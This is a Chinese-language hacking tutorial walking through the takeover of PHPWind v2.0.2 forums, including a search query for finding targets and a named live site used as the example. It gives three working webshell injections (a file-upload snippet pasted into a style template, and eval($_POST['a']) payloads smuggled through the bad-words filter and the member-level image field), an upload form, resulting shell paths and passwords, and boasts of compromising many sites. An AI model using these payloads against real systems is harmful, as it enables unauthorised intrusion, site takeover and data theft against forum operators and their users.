phpwind漏洞利用终结篇

【字号: 日期:2024-10-22浏览:23作者:雯心

这漏洞出了也有段时间了..开始在Q里..三少哥哥先发了漏洞利用工具给我..然后自己试着传上了PHP马..然后枫三少又告诉我一种方法...拿下了不少站...当晚准备把文章赶写出来..太困了就没继续写...这几天家里发生的事太多..一直也没时间写...最近网上也出了文章和教程,我看了下都不是很完整..今天我就来做个完结篇的..算是庆祝我升黑基管理员把....

首先在baidu或google搜索Powered by PHPWind v2.0.2 或Powered by PHPWind v2.0.2, PLUS V2.1

为了不耽误大家时间..我提前找了一个http://www.arebbs.com/先注册一个...注册过程我想大家都会的把..。我已经注册好了..登陆.然后用玄猫写的phpwind提升漏洞测试程序提权.提示失败..但也不要灰心...我们来看下..看..多出了一个'系统设置 '我在测试的时候.发现好几个站都是这样,.但结果都是成功的...下面我们继续拿webshell将介绍三种方法给大家

请将此文件(template/baobao/header.htm)属性设置为 777 可写模式汗了...好象管理员发现了..把这个设置了不可写...大家可以找别的站试下...把方法说下方法一.进入后台,找到“风格模板设置”在原有的代码前面加入以下代码:<style type='text/css'></style><!--EOT;?>--><?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?><!--<?phpprint <<<EOT-->

保存后,木马地址为当前目录下的faq.php

在本机用如下表单进行提交:<form ENCTYPE='multipart/form-data' ACTION='http://目标服务器/faq.php' METHOD='POST'><input NAME='MyFile' TYPE='file'><input VALUE=' 提交 ' TYPE='submit'></form>上传成功后的木马存在论坛目录下直接访问就行!假设现在的这个是可以的...这个是我以前搞的..我试下还能用不..看样是不行了..大家只要把这里换一下..然后就可以本地上传任意文件了..前提是次目录是可写的...如果不可写..我们还可以利用第二种方法..

方法二.

首先用EXP进入后台,在后台里执行如下过程:新增 不良词语写 a']='aa';eval($_POST['a']);// 替换为那里可以写随便写..我这里替换了11而后得到一个shell地址为 http://www.arebbs.com/data/bbscache/wordsfb.php写如成功后wordsfb.php文件的代码就成了

<?php$wordsfb['a']='aa';eval($_POST['a']);//']='1';?>

然后用lanker微型PHP后门客户2.0正式版.htm上传一个新PHP马...密码是a这样我们就得到webshell了...

本程序目录..我们来传个马看下.hb.php是angel写的PHP马...出现OK就是上传成功...我们访问下看看http://www.arebbs.com/data/bbscache/hb.php密码www.ciker.org登陆/....就这么简单...:)

下面还有一个方法是在网上看到的..也介绍下把..

方法三.用户等级管理然后新建立会员组头衔你可以随便写,但是千万不要写单双引号特殊符号,升级图片号写a';eval($_POST['a']);//升级点数依然可以随意写。

而后得到一个shell地址为 http://localhost/bbs/data/bbscache/level.php密码是a lanker的一句话后门。

接下来的就跟方法二要做的一样了..

我们试下有没成功.密码同样是a晕...难道被发现了?估计是封了我IPwebshell可以访问...看样是把我IP封了..刚才试的时候...出了错误..

感觉是升级图片号写a';eval($_POST['a']);//这句问题.如果大家在测试时候也出现和我同样的错误把a';eval($_POST['a']);//这个改为a']='aa';eval($_POST['a']);//...我就不费时间去找别的站测试了...如果大家有好的发现欢迎与我交流

相关文章: